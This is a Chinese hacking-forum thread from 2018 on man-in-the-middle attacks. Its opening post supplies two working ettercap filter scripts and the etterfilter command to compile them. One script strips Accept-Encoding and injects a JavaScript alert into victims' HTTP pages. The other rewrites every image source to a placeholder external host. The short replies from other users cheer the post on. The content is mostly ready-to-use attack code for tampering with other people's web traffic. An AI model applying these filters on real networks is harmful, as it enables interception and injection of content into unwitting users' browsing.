Kali 笔记

搜索
查看: 4148|回复: 5

中间人攻击的那些事

  [复制链接]

253

主题

357

帖子

795

积分

vip用户

Rank: 6Rank: 6

积分
795

注册会员活跃会员热心会员

QQ
发表于 2018-5-26 13:15:18 | 显示全部楼层 |阅读模式
今天看到管理员在微信公众平台发布的关于中间人攻击的手段,让我兴趣极高。自己也根据公众号的教程和自己的实践。动手操作,现在来和大家分享分享吧。

一:js注入弹出文字
我们先写一个脚本文件

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<head>", "<head><script type="text/javascript">alert('hacker!');</script>");
replace("<HEAD>", "<HEAD><script type="text/javascript">alert('hacker!');</script>");
msg("注入成功!!\n");
}

我这里暂且这个文本命名为alert.filter,然后保存。

这个脚本可以替换替换HTML代码中的<head>,在后面加入
<script type=”text/JavaScript”>alert(‘hacker!’);</script>
玩Web的童鞋对这个应该很熟悉,就是在网页上弹出提示框的。要使用这个脚本,还需要使用ettercap自带的编译工具把这个脚本编译成ettercap可以识别的二进制文件。使用如下命令编译:

etterfilter alert.filter -o alert.ef

然后在根据作者视频中的提示,loadafiler即可完成中间人攻击!
二:替换网页图片
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=http://xxxxx.com/jpe.jpg/&' ");
replace("IMG SRC=", "img src=http://xxxxx.com/jpe.jpg/&' ");
msg("过滤执行.\n");
}

后面的操作不变。载入文件后开始中间人攻击。则可完成对网页图片的替换。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
有没有参加CTF比赛的,一起组队啊!
回复

使用道具 举报

128

主题

202

帖子

450

积分

中级会员

中国黑客

Rank: 3Rank: 3

积分
450
QQ
发表于 2018-5-26 13:22:59 来自手机 | 显示全部楼层
成功了吗?我回去了也试试!
回复 支持 反对

使用道具 举报

253

主题

357

帖子

795

积分

vip用户

Rank: 6Rank: 6

积分
795

注册会员活跃会员热心会员

QQ
 楼主| 发表于 2018-5-26 13:24:30 来自手机 | 显示全部楼层
priess1314 发表于 2018-5-26 13:22
成功了吗?我回去了也试试!

嗯,按照我说的做!
回复 支持 反对

使用道具 举报

1

主题

14

帖子

65

积分

注册会员

Rank: 2

积分
65
发表于 2018-7-23 14:56:58 | 显示全部楼层
嗯,按照我说的做!
回复 支持 反对

使用道具 举报

5

主题

7

帖子

88

积分

注册会员

Rank: 2

积分
88
发表于 2018-8-12 16:00:02 来自手机 | 显示全部楼层
支持大佬!
回复

使用道具 举报

7

主题

13

帖子

228

积分

中级会员

Rank: 3Rank: 3

积分
228
发表于 2018-8-16 20:12:07 来自手机 | 显示全部楼层
学习了!感谢分享
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表